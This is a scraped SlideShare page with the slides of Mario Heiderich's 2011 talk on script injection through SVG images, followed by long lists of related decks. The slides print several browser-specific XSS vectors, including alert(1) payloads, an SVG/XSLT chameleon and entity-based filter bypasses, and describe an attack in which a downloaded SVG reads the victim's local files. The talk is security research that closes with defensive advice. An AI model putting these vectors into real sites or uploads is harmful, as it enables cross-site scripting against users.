SlideShare a Scribd company logo

The Image that called me - Active Content Injection with SVG Files

Mario Heiderich
Mario Heiderich
Technology
1 of 29
Download to read offline
The Image that called me Active Content Injection with SVG Files A presentation by Mario Heiderich, 2011
Introduction ● Mario Heiderich ● Researcher and PhD student at the Ruhr- University, Bochum ● Security Researcher for Microsoft, Redmond ● Security Consultant for XING AG, Hamburg ● Published author and international speaker ● HTML5 Security Cheatsheet / H5SC ● PHPIDS Project
Today ● SVGs and the modern web ● What are SVGs? ● What are they capable of? ● Which browsers “understand” SVG? ● Why there are conflicted areas? ● And what does that have to do with security?
SVG Images ● Scalable Vector Graphics ● XML based, therefore ● Versatile ● Accessible ● Compressible ● “Stylable” w. CSS ● Open ● Great for mobile devices ● Easy to parse and process ● Ancient format, older than 10 years ● Relations to HTML5, the living standard
SVG History ● Proposed by several W3C members in 1998 ● Derived from Adobe Postscript and VML ● Developed in 1999 ● Currently at version 1.1 ● Version 1.2 still a working draft ● Might be overtaken by SVG 2.0 ● Good browser support ● Gecko, Webkit, Presto, and Trident
Basic Example <svg xmlns=“http://www.w3.org/2000/svg“> <circle r=“40“ fill=“red“></circle> </svg>
SVG Family ● SVG Tiny 1.2 ● Designed for cellphones and smart-phones ● 47 Tags ● SVG Basic 1.1 ● Designed for handhelds, tablets and net-books ● 71 tags ● SVG Full 1.1 ● Full feature set ● 81 tags
Features ● Geometrical shapes ● Circles, ellipses, squares, lines and more ● SVG fonts ● Font specific formatting and glyph styles ● Links ● Animations and Transformations ● Gradients and Effects ● Meta-data ● Scripting and Events ● Inclusion of arbitrary objects
SVG in Action
Scripting ● The following SVG executes JavaScript <svg xmlns=“http://www.w3.org/2000/svg“> <script> alert(1) </script> </svg> ● More examples?
More Scripting <svg xmlns="http://www.w3.org/2000/svg"> <g onload="javascript:alert(1)"></g> </svg> <svg xmlns="http://www.w3.org/2000/svg"> <animation xlink:href="javascript:alert(1)"/> </svg> <svg xmlns="http://www.w3.org/2000/svg"> <foreignObject xlink:href="javascript:alert(1)"/> </svg> <svg xmlns="http://www.w3.org/2000/svg">  <set attributeName="onmouseover" to="alert(1)"/>  </svg> <svg xmlns="http://www.w3.org/2000/svg">  <handler  xmlns:ev="http://www.w3.org/2001/xml­events"  ev:event="load" >alert(1)</handler> </svg>
Deploying SVGs ● Several ways of deploying SVGs, implemented by modern browsers ● Five important ones are: ● Opening the file directly ● Deployment via <object> or <embed> ● Deployment via <img> or <image> ● Deployment via CSS background/list- style/content/cursor ● In-line SVG
Security Boundaries ● SVG capabilities based on deployment method ● A model, based on expectations ● Heterogeneous implementations ● And a whole new world of bugs and vulnerabilities
XSS ● SVGs deployed via <img> and <image> tag should not execute JavaScript ● Same goes for SVGs used via CSS ● Or SVG fonts ● SVGs deployed via <iframe>, <embed> or <object> should, though ● So browsers need different approaches ● Learning by fixing?
Local SVGs ● SVGs opened directly are allowed to script ● Imagine the following attack: ● Attacker uploads an image with an exciting motive to a server ● Victim navigates to the image, likes it, saves it locally, downloads folder or desktop ● Victim wants to watch the image again and double-clicks it ● Image is an SVG and executes JavaScript locally ● Attacker can read local files (same directory, sub-folders) ● Attacker can even load and start Java applets or worse ● Very likely too be used in real life attacks! ● Porn sites, Email attachments, Malware
In-line SVG ● Suggested by the HTML5 specs ● Working on all modern browsers ● Opera 11 recently joined in ● No strict XML parser anymore ● <svg><circle r=40 fill=red></svg> ● See – no quotes, no trailing slash ● Reduced feature set ● <svg> introduces many new XSS vectors ● XSS filter bypasses
Scoping ● SVG images are treated by browsers similarly to XML ● Same is for in-line SVG blocks ● XML treats plain-text tags differently ● Entities and canonical character representations are treated equally ● 0-Day filter bypasses ahead ● This enables a new attack technique on Firefox and other browsers ● DEMO ● And it's even worse ● In-line SVG “self-terminates” open HTML elements
Opera ● A long history of SVG flaws ● JavaScript execution via SVG fonts ● XSS via CSS background images ● SVG containing XHTML renders HTML via <img> ● Today SVGs deployed via CSS/<img> cannot script anymore ● But - not all kinds of attacks need scripting to succeed ● DEMO
Firefox ● SVG/HTML Chameleon <?xml version="1.0"?> <?xml-stylesheet type="text/xml" href="#stylesheet"?> <!DOCTYPE doc [ <!ATTLIST xsl:stylesheet id ID #REQUIRED> ]> <svg xmlns="http://www.w3.org/2000/svg"> <xsl:stylesheet id="stylesheet" version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> <xsl:template match="/"> <iframe xmlns="http://www.w3.org/1999/xhtml" src="javascript:alert(1)"> </iframe> </xsl:template> </xsl:stylesheet> <circle fill="red" r="40"></circle> </svg>
Opera ● Using entities to execute JavaScript ● innerHTML copy/decompile bug <a href="#">CLICKME 1</a> <svg style=display:none><style> &ast;{ - o&#45fabbalink&colon;&apos;javascript&colon;alert&lpar;1 &rpar;&apos;&semi; -o&#45fabbalink-source&colon;current <span/> <a href="#">CLICKME 2</a>
More Opera ● SVG via favicon
Chromium ● Incredible parser tolerance ● 1<svg <g onload=alert(1) </p>
Firefox ● Enabling XSS via entity decoding ● Entities in <style> tags create new elements ● Even broken ones, half-broken to be honest ● Bug #650001 <svg> <style>&ltimg/src=x onerror=alert(1)//
Other Browsers ● Firefox 4 crashed badly on SVGs embedding JS ● Chrome produces weird things when using <foreignObject> and <iframe> ● Opera deploys Java applets via SVG fonts ● And what about other XML related attack patterns? ● External entities ● SVG Tiny 1.2 Java Events ● Entity bombs ● Etc. etc. ● Some browsers support SVG Masks, perfect for click- jacking ● SVG and XBL? You tell me!
Wrap-Up ● SVGs are not just images but mini-applications ● <img> tags can now deploy Java, PDF and Flash – and call you on Skype ● In-line SVG creates small XML islands enabling XML attacks on HTML websites ● SVG and XSLT work too, enabling DoS and other attacks ● Web-security and XML security, they meet again! ● And XXE is back – remember 2002's advisories? ● SVG is not getting enough attention in the security community ● SVG provides a lot of room for more security research
Defense ● More difficult than one might assume ● No existing filter libs ● No good documentation ● XSS vectors are hard to comprehend ● New vectors coming up weekly ● SVG files should not be perceived as images ● Allowing SVG for upload == allowing HTML for upload ● SVG can embed, link or reference any kind of content over cross domain borders ● SVG provides new ways of payload obfuscation
Future Work ● SVG Purifier ● Based on HTMLPurifier 4.3.0 ● Still very young ● Smoke-test has been published http://heideri.ch/svgpurifier ● More articles on the HTML5 Sec Cheatsheet Wiki ● Publications, to raise awareness ● Crouching Tiger – Hidden Payload, submission CCS 2011 ● More demo vectors on the H5SC to demonstrate impact ● OWASP research and documentation?
Links ● Wikipedia on SVG http://en.wikipedia.org/wiki/Scalable_Vector_Graphics ● W3C SVG Working Group http://www.w3.org/Graphics/SVG/ ● SVG Full 1.1 (W3C) http://www.w3.org/TR/SVG11/ ● SVG Basic 1.1 and SVG Tiny 1.2 http://www.w3.org/TR/SVGMobile/ ● SVG 2.0 http://dev.w3.org/SVG/profiles/2.0/publish/intro.html ● Adobe's SVG Zone (for archaeologists) http://www.adobe.com/svg/ ● H5SC http://html5sec.org/ ● XSLT and SVG http://scarybeastsecurity.blogspot.com/20...riousity.html ● Opera SVG Bug http://heideri.ch/opera/ ● HTMLPurifier http://htmlpurifier.org/ ● JSBin http://jsbin.com/ ● SVGPurifier Smoke-Test http://heideri.ch/svgpurifier ● More SVG fun http://maliciousmarkup.blogspot.com/20...re-xml-fun.html
Thanks ● Thanks for listening! ● Questions or Comments? ● Discussion and tool preview? ● Thanks to ● Gareth Heyes and Manuel Caballero from UNH ● Alexey Silin / LeverOne ● Erik of Opera ● Dave Ross of Microsoft

Recommended

Locking the Throneroom 2.0
Locking the Throneroom 2.0Locking the Throneroom 2.0
Locking the Throneroom 2.0Mario Heiderich
 
An Abusive Relationship with AngularJS
An Abusive Relationship with AngularJSAn Abusive Relationship with AngularJS
An Abusive Relationship with AngularJSMario Heiderich
 
Scriptless Attacks - Stealing the Pie without touching the Sill
Scriptless Attacks - Stealing the Pie without touching the SillScriptless Attacks - Stealing the Pie without touching the Sill
Scriptless Attacks - Stealing the Pie without touching the SillMario Heiderich
 
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...Mario Heiderich
 
What should a hacker know about WebDav?
What should a hacker know about WebDav?What should a hacker know about WebDav?
What should a hacker know about WebDav?Mikhail Egorov
 
In the DOM, no one will hear you scream
In the DOM, no one will hear you screamIn the DOM, no one will hear you scream
In the DOM, no one will hear you screamMario Heiderich
 
JSMVCOMFG - To sternly look at JavaScript MVC and Templating Frameworks
JSMVCOMFG - To sternly look at JavaScript MVC and Templating FrameworksJSMVCOMFG - To sternly look at JavaScript MVC and Templating Frameworks
JSMVCOMFG - To sternly look at JavaScript MVC and Templating FrameworksMario Heiderich
 
Cross-domain requests with CORS
Cross-domain requests with CORSCross-domain requests with CORS
Cross-domain requests with CORSVladimir Dzhuvinov
 

Recommended

Locking the Throneroom 2.0
Locking the Throneroom 2.0Locking the Throneroom 2.0
Locking the Throneroom 2.0Mario Heiderich
 
An Abusive Relationship with AngularJS
An Abusive Relationship with AngularJSAn Abusive Relationship with AngularJS
An Abusive Relationship with AngularJSMario Heiderich
 
Scriptless Attacks - Stealing the Pie without touching the Sill
Scriptless Attacks - Stealing the Pie without touching the SillScriptless Attacks - Stealing the Pie without touching the Sill
Scriptless Attacks - Stealing the Pie without touching the SillMario Heiderich
 
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...Mario Heiderich
 
What should a hacker know about WebDav?
What should a hacker know about WebDav?What should a hacker know about WebDav?
What should a hacker know about WebDav?Mikhail Egorov
 
In the DOM, no one will hear you scream
In the DOM, no one will hear you screamIn the DOM, no one will hear you scream
In the DOM, no one will hear you screamMario Heiderich
 
JSMVCOMFG - To sternly look at JavaScript MVC and Templating Frameworks
JSMVCOMFG - To sternly look at JavaScript MVC and Templating FrameworksJSMVCOMFG - To sternly look at JavaScript MVC and Templating Frameworks
JSMVCOMFG - To sternly look at JavaScript MVC and Templating FrameworksMario Heiderich
 
Cross-domain requests with CORS
Cross-domain requests with CORSCross-domain requests with CORS
Cross-domain requests with CORSVladimir Dzhuvinov
 
Introduction to AngularJS
Introduction to AngularJSIntroduction to AngularJS
Introduction to AngularJSDavid Parsons
 
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015CODE BLUE
 
The innerHTML Apocalypse
The innerHTML ApocalypseThe innerHTML Apocalypse
The innerHTML ApocalypseMario Heiderich
 
Puppeteer
PuppeteerPuppeteer
PuppeteerAdrian Caetano
 
Dust.js
Dust.jsDust.js
Dust.jsYevgeniy Brikman
 
Defending against Java Deserialization Vulnerabilities
Defending against Java Deserialization Vulnerabilities Defending against Java Deserialization Vulnerabilities
Defending against Java Deserialization VulnerabilitiesLuca Carettoni
 
OWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling PicklesOWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling PicklesChristopher Frohoff
 
XSS Magic tricks
XSS Magic tricksXSS Magic tricks
XSS Magic tricksGarethHeyes
 
A story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEMA story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEMFrans Rosén
 
webpack 101 slides
webpack 101 slideswebpack 101 slides
webpack 101 slidesmattysmith
 
Angularjs PPT
Angularjs PPTAngularjs PPT
Angularjs PPTAmit Baghel
 
Introduction to JavaScript
Introduction to JavaScriptIntroduction to JavaScript
Introduction to JavaScriptMegha V
 
Service Worker Presentation
Service Worker PresentationService Worker Presentation
Service Worker PresentationKyle Dorman
 
Introduction to Node js
Introduction to Node jsIntroduction to Node js
Introduction to Node jsAkshay Mathur
 
jQuery for beginners
jQuery for beginnersjQuery for beginners
jQuery for beginnersArulmurugan Rajaraman
 
Pentesting jwt
Pentesting jwtPentesting jwt
Pentesting jwtJaya Kumar Kondapalli
 
OWASP SD: Deserialize My Shorts: Or How I Learned To Start Worrying and Hate ...
OWASP SD: Deserialize My Shorts: Or How I Learned To Start Worrying and Hate ...OWASP SD: Deserialize My Shorts: Or How I Learned To Start Worrying and Hate ...
OWASP SD: Deserialize My Shorts: Or How I Learned To Start Worrying and Hate ...Christopher Frohoff
 
BlueHat v17 || Dangerous Contents - Securing .Net Deserialization
BlueHat v17 || Dangerous Contents - Securing .Net Deserialization BlueHat v17 || Dangerous Contents - Securing .Net Deserialization
BlueHat v17 || Dangerous Contents - Securing .Net Deserialization BlueHat Security Conference
 
Go Programming Language (Golang)
Go Programming Language (Golang)Go Programming Language (Golang)
Go Programming Language (Golang)Ishin Vin
 
Node JS Crash Course
Node JS Crash CourseNode JS Crash Course
Node JS Crash CourseHaim Michael
 
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...Mario Heiderich
 
Never fear, the customizer is here!
Never fear, the customizer is here!Never fear, the customizer is here!
Never fear, the customizer is here!Cameron Jones
 

More Related Content

What's hot

Introduction to AngularJS
Introduction to AngularJSIntroduction to AngularJS
Introduction to AngularJSDavid Parsons
 
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015CODE BLUE
 
The innerHTML Apocalypse
The innerHTML ApocalypseThe innerHTML Apocalypse
The innerHTML ApocalypseMario Heiderich
 
Defending against Java Deserialization Vulnerabilities
Defending against Java Deserialization Vulnerabilities Defending against Java Deserialization Vulnerabilities
Defending against Java Deserialization VulnerabilitiesLuca Carettoni
 
OWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling PicklesOWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling PicklesChristopher Frohoff
 
XSS Magic tricks
XSS Magic tricksXSS Magic tricks
XSS Magic tricksGarethHeyes
 
A story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEMA story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEMFrans Rosén
 
webpack 101 slides
webpack 101 slideswebpack 101 slides
webpack 101 slidesmattysmith
 
Introduction to JavaScript
Introduction to JavaScriptIntroduction to JavaScript
Introduction to JavaScriptMegha V
 
Service Worker Presentation
Service Worker PresentationService Worker Presentation
Service Worker PresentationKyle Dorman
 
Introduction to Node js
Introduction to Node jsIntroduction to Node js
Introduction to Node jsAkshay Mathur
 
OWASP SD: Deserialize My Shorts: Or How I Learned To Start Worrying and Hate ...
OWASP SD: Deserialize My Shorts: Or How I Learned To Start Worrying and Hate ...OWASP SD: Deserialize My Shorts: Or How I Learned To Start Worrying and Hate ...
OWASP SD: Deserialize My Shorts: Or How I Learned To Start Worrying and Hate ...Christopher Frohoff
 
BlueHat v17 || Dangerous Contents - Securing .Net Deserialization
BlueHat v17 || Dangerous Contents - Securing .Net Deserialization BlueHat v17 || Dangerous Contents - Securing .Net Deserialization
BlueHat v17 || Dangerous Contents - Securing .Net Deserialization BlueHat Security Conference
 
Go Programming Language (Golang)
Go Programming Language (Golang)Go Programming Language (Golang)
Go Programming Language (Golang)Ishin Vin
 
Node JS Crash Course
Node JS Crash CourseNode JS Crash Course
Node JS Crash CourseHaim Michael
 

What's hot (20)

Introduction to AngularJS
Introduction to AngularJSIntroduction to AngularJS
Introduction to AngularJS
 
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
 
The innerHTML Apocalypse
The innerHTML ApocalypseThe innerHTML Apocalypse
The innerHTML Apocalypse
 
Puppeteer
PuppeteerPuppeteer
Puppeteer
 
Dust.js
Dust.jsDust.js
Dust.js
 
Defending against Java Deserialization Vulnerabilities
Defending against Java Deserialization Vulnerabilities Defending against Java Deserialization Vulnerabilities
Defending against Java Deserialization Vulnerabilities
 
OWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling PicklesOWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling Pickles
 
XSS Magic tricks
XSS Magic tricksXSS Magic tricks
XSS Magic tricks
 
A story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEMA story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEM
 
webpack 101 slides
webpack 101 slideswebpack 101 slides
webpack 101 slides
 
Angularjs PPT
Angularjs PPTAngularjs PPT
Angularjs PPT
 
Introduction to JavaScript
Introduction to JavaScriptIntroduction to JavaScript
Introduction to JavaScript
 
Service Worker Presentation
Service Worker PresentationService Worker Presentation
Service Worker Presentation
 
Introduction to Node js
Introduction to Node jsIntroduction to Node js
Introduction to Node js
 
jQuery for beginners
jQuery for beginnersjQuery for beginners
jQuery for beginners
 
Pentesting jwt
Pentesting jwtPentesting jwt
Pentesting jwt
 
OWASP SD: Deserialize My Shorts: Or How I Learned To Start Worrying and Hate ...
OWASP SD: Deserialize My Shorts: Or How I Learned To Start Worrying and Hate ...OWASP SD: Deserialize My Shorts: Or How I Learned To Start Worrying and Hate ...
OWASP SD: Deserialize My Shorts: Or How I Learned To Start Worrying and Hate ...
 
BlueHat v17 || Dangerous Contents - Securing .Net Deserialization
BlueHat v17 || Dangerous Contents - Securing .Net Deserialization BlueHat v17 || Dangerous Contents - Securing .Net Deserialization
BlueHat v17 || Dangerous Contents - Securing .Net Deserialization
 
Go Programming Language (Golang)
Go Programming Language (Golang)Go Programming Language (Golang)
Go Programming Language (Golang)
 
Node JS Crash Course
Node JS Crash CourseNode JS Crash Course
Node JS Crash Course
 

Viewers also liked

Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...Mario Heiderich
 
Never fear, the customizer is here!
Never fear, the customizer is here!Never fear, the customizer is here!
Never fear, the customizer is here!Cameron Jones
 
Debugging WordPress Core and Plugins!
Debugging WordPress Core and Plugins!Debugging WordPress Core and Plugins!
Debugging WordPress Core and Plugins!Bronson Quick
 
Create a newsletter in less than 17 minutes without writing a single word
Create a newsletter in less than 17 minutes without writing a single wordCreate a newsletter in less than 17 minutes without writing a single word
Create a newsletter in less than 17 minutes without writing a single wordNik Cree
 
ng-owasp: OWASP Top 10 for AngularJS Applications
ng-owasp: OWASP Top 10 for AngularJS Applicationsng-owasp: OWASP Top 10 for AngularJS Applications
ng-owasp: OWASP Top 10 for AngularJS ApplicationsKevin Hakanson
 
Vector Graphics on the Web: SVG, Canvas, CSS3
Vector Graphics on the Web: SVG, Canvas, CSS3Vector Graphics on the Web: SVG, Canvas, CSS3
Vector Graphics on the Web: SVG, Canvas, CSS3Pascal Rettig
 
Build HTML5 App (Intel Elements 2011)
Build HTML5 App (Intel Elements 2011)Build HTML5 App (Intel Elements 2011)
Build HTML5 App (Intel Elements 2011)Ariya Hidayat
 
Generic Attack Detection - ph-Neutral 0x7d8
Generic Attack Detection - ph-Neutral 0x7d8Generic Attack Detection - ph-Neutral 0x7d8
Generic Attack Detection - ph-Neutral 0x7d8Mario Heiderich
 
Image Handling: Understanding the Basics of WordPress Media
Image Handling: Understanding the Basics of WordPress MediaImage Handling: Understanding the Basics of WordPress Media
Image Handling: Understanding the Basics of WordPress MediaRich Plakas
 
Cern talk. David Galbraith: Beyond WWW
Cern talk. David Galbraith: Beyond WWWCern talk. David Galbraith: Beyond WWW
Cern talk. David Galbraith: Beyond WWWdivadwg
 
Storytelling using Javascript HTML5 CSS3
Storytelling using Javascript HTML5 CSS3Storytelling using Javascript HTML5 CSS3
Storytelling using Javascript HTML5 CSS3Xavier Damman
 
HTML5 어디까지 왔나?
HTML5 어디까지 왔나?HTML5 어디까지 왔나?
HTML5 어디까지 왔나?정현 황
 
The WordPress Industry Survey 2016
The WordPress Industry Survey 2016The WordPress Industry Survey 2016
The WordPress Industry Survey 2016WP Engine
 
Realm: Building a mobile database
Realm: Building a mobile databaseRealm: Building a mobile database
Realm: Building a mobile databaseChristian Melchior
 
Stuff I've said to FOIA officers to get them to give me ... well, stuff
Stuff I've said to FOIA officers to get them to give me ... well, stuffStuff I've said to FOIA officers to get them to give me ... well, stuff
Stuff I've said to FOIA officers to get them to give me ... well, stuffCezary Podkul
 
Владимирское Общественное Собрание: первый год работы
Владимирское Общественное Собрание: первый год работыВладимирское Общественное Собрание: первый год работы
Владимирское Общественное Собрание: первый год работыNikolenko
 
Project MARTHA in Inter manager dispatch-issue-18
Project MARTHA in Inter manager dispatch-issue-18Project MARTHA in Inter manager dispatch-issue-18
Project MARTHA in Inter manager dispatch-issue-18Wessel van Leeuwen
 

Viewers also liked (18)

Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
 
Never fear, the customizer is here!
Never fear, the customizer is here!Never fear, the customizer is here!
Never fear, the customizer is here!
 
Debugging WordPress Core and Plugins!
Debugging WordPress Core and Plugins!Debugging WordPress Core and Plugins!
Debugging WordPress Core and Plugins!
 
Create a newsletter in less than 17 minutes without writing a single word
Create a newsletter in less than 17 minutes without writing a single wordCreate a newsletter in less than 17 minutes without writing a single word
Create a newsletter in less than 17 minutes without writing a single word
 
ng-owasp: OWASP Top 10 for AngularJS Applications
ng-owasp: OWASP Top 10 for AngularJS Applicationsng-owasp: OWASP Top 10 for AngularJS Applications
ng-owasp: OWASP Top 10 for AngularJS Applications
 
Vector Graphics on the Web: SVG, Canvas, CSS3
Vector Graphics on the Web: SVG, Canvas, CSS3Vector Graphics on the Web: SVG, Canvas, CSS3
Vector Graphics on the Web: SVG, Canvas, CSS3
 
Build HTML5 App (Intel Elements 2011)
Build HTML5 App (Intel Elements 2011)Build HTML5 App (Intel Elements 2011)
Build HTML5 App (Intel Elements 2011)
 
Generic Attack Detection - ph-Neutral 0x7d8
Generic Attack Detection - ph-Neutral 0x7d8Generic Attack Detection - ph-Neutral 0x7d8
Generic Attack Detection - ph-Neutral 0x7d8
 
Image Handling: Understanding the Basics of WordPress Media
Image Handling: Understanding the Basics of WordPress MediaImage Handling: Understanding the Basics of WordPress Media
Image Handling: Understanding the Basics of WordPress Media
 
Cern talk. David Galbraith: Beyond WWW
Cern talk. David Galbraith: Beyond WWWCern talk. David Galbraith: Beyond WWW
Cern talk. David Galbraith: Beyond WWW
 
Storytelling using Javascript HTML5 CSS3
Storytelling using Javascript HTML5 CSS3Storytelling using Javascript HTML5 CSS3
Storytelling using Javascript HTML5 CSS3
 
HTML5 어디까지 왔나?
HTML5 어디까지 왔나?HTML5 어디까지 왔나?
HTML5 어디까지 왔나?
 
The WordPress Industry Survey 2016
The WordPress Industry Survey 2016The WordPress Industry Survey 2016
The WordPress Industry Survey 2016
 
Realm: Building a mobile database
Realm: Building a mobile databaseRealm: Building a mobile database
Realm: Building a mobile database
 
Danger Of Free
Danger Of FreeDanger Of Free
Danger Of Free
 
Stuff I've said to FOIA officers to get them to give me ... well, stuff
Stuff I've said to FOIA officers to get them to give me ... well, stuffStuff I've said to FOIA officers to get them to give me ... well, stuff
Stuff I've said to FOIA officers to get them to give me ... well, stuff
 
Владимирское Общественное Собрание: первый год работы
Владимирское Общественное Собрание: первый год работыВладимирское Общественное Собрание: первый год работы
Владимирское Общественное Собрание: первый год работы
 
Project MARTHA in Inter manager dispatch-issue-18
Project MARTHA in Inter manager dispatch-issue-18Project MARTHA in Inter manager dispatch-issue-18
Project MARTHA in Inter manager dispatch-issue-18
 

Similar to The Image that called me - Active Content Injection with SVG Files

HTML5: An Introduction To Next Generation Web Development
HTML5: An Introduction To Next Generation Web DevelopmentHTML5: An Introduction To Next Generation Web Development
HTML5: An Introduction To Next Generation Web DevelopmentTilak Joshi
 
JavaONE 2012 Using Java with HTML5 and CSS3
JavaONE 2012 Using Java with HTML5 and CSS3JavaONE 2012 Using Java with HTML5 and CSS3
JavaONE 2012 Using Java with HTML5 and CSS3Helder da Rocha
 
HTML5DevConf 2013 (October): WebGL is a game changer!
HTML5DevConf 2013 (October): WebGL is a game changer!HTML5DevConf 2013 (October): WebGL is a game changer!
HTML5DevConf 2013 (October): WebGL is a game changer!Iker Jamardo
 
Thats Not Flash?
Thats Not Flash?Thats Not Flash?
Thats Not Flash?Mike Wilcox
 
Academy PRO: HTML5 API graphics
Academy PRO: HTML5 API graphicsAcademy PRO: HTML5 API graphics
Academy PRO: HTML5 API graphicsBinary Studio
 
Rich Media Advertising with SVG and JavaScript
Rich Media Advertising with SVG and JavaScriptRich Media Advertising with SVG and JavaScript
Rich Media Advertising with SVG and JavaScriptGjokica Zafirovski
 
SVG Icons and Screen Reader Accessibility
SVG Icons and Screen Reader AccessibilitySVG Icons and Screen Reader Accessibility
SVG Icons and Screen Reader AccessibilityDennis Lembree
 
WHAT IS HTML5? (at CSS Nite Osaka)
WHAT IS HTML5? (at CSS Nite Osaka)WHAT IS HTML5? (at CSS Nite Osaka)
WHAT IS HTML5? (at CSS Nite Osaka)Shumpei Shiraishi
 
Accessibility Hacks version 2
Accessibility Hacks version 2Accessibility Hacks version 2
Accessibility Hacks version 2Graham Armfield
 
Accessibility Hacks Version 2
Accessibility Hacks Version 2Accessibility Hacks Version 2
Accessibility Hacks Version 2Graham Armfield
 
Accessibility Hacks Wordcamp Manchester October 2018
Accessibility Hacks Wordcamp Manchester October 2018Accessibility Hacks Wordcamp Manchester October 2018
Accessibility Hacks Wordcamp Manchester October 2018Graham Armfield
 
Streaming of SVG animations on the Web
Streaming of SVG animations on the WebStreaming of SVG animations on the Web
Streaming of SVG animations on the WebCyril Concolato
 
Canvas Based Presentation tool - First Review
Canvas Based Presentation tool - First ReviewCanvas Based Presentation tool - First Review
Canvas Based Presentation tool - First ReviewArvind Krishnaa
 
Java script Session No 1
Java script Session No 1Java script Session No 1
Java script Session No 1Saif Ullah Dar
 
Html5 Canvas and Mobile Graphics
Html5 Canvas and Mobile GraphicsHtml5 Canvas and Mobile Graphics
Html5 Canvas and Mobile GraphicsEngin Hatay
 

Similar to The Image that called me - Active Content Injection with SVG Files (20)

HTML5: An Introduction To Next Generation Web Development
HTML5: An Introduction To Next Generation Web DevelopmentHTML5: An Introduction To Next Generation Web Development
HTML5: An Introduction To Next Generation Web Development
 
JavaONE 2012 Using Java with HTML5 and CSS3
JavaONE 2012 Using Java with HTML5 and CSS3JavaONE 2012 Using Java with HTML5 and CSS3
JavaONE 2012 Using Java with HTML5 and CSS3
 
Html5 more than just html5 v final
Html5 more than just html5 v finalHtml5 more than just html5 v final
Html5 more than just html5 v final
 
HTML5DevConf 2013 (October): WebGL is a game changer!
HTML5DevConf 2013 (October): WebGL is a game changer!HTML5DevConf 2013 (October): WebGL is a game changer!
HTML5DevConf 2013 (October): WebGL is a game changer!
 
Thats Not Flash?
Thats Not Flash?Thats Not Flash?
Thats Not Flash?
 
Academy PRO: HTML5 API graphics
Academy PRO: HTML5 API graphicsAcademy PRO: HTML5 API graphics
Academy PRO: HTML5 API graphics
 
Rich Media Advertising with SVG and JavaScript
Rich Media Advertising with SVG and JavaScriptRich Media Advertising with SVG and JavaScript
Rich Media Advertising with SVG and JavaScript
 
SVG Icons and Screen Reader Accessibility
SVG Icons and Screen Reader AccessibilitySVG Icons and Screen Reader Accessibility
SVG Icons and Screen Reader Accessibility
 
Html 5 svg
Html 5 svgHtml 5 svg
Html 5 svg
 
WHAT IS HTML5? (at CSS Nite Osaka)
WHAT IS HTML5? (at CSS Nite Osaka)WHAT IS HTML5? (at CSS Nite Osaka)
WHAT IS HTML5? (at CSS Nite Osaka)
 
Next generation Graphics: SVG
Next generation Graphics: SVGNext generation Graphics: SVG
Next generation Graphics: SVG
 
Learn svg
Learn svgLearn svg
Learn svg
 
Accessibility Hacks version 2
Accessibility Hacks version 2Accessibility Hacks version 2
Accessibility Hacks version 2
 
Accessibility Hacks Version 2
Accessibility Hacks Version 2Accessibility Hacks Version 2
Accessibility Hacks Version 2
 
Accessibility Hacks Wordcamp Manchester October 2018
Accessibility Hacks Wordcamp Manchester October 2018Accessibility Hacks Wordcamp Manchester October 2018
Accessibility Hacks Wordcamp Manchester October 2018
 
Streaming of SVG animations on the Web
Streaming of SVG animations on the WebStreaming of SVG animations on the Web
Streaming of SVG animations on the Web
 
Canvas Based Presentation tool - First Review
Canvas Based Presentation tool - First ReviewCanvas Based Presentation tool - First Review
Canvas Based Presentation tool - First Review
 
Echo HTML5
Echo HTML5Echo HTML5
Echo HTML5
 
Java script Session No 1
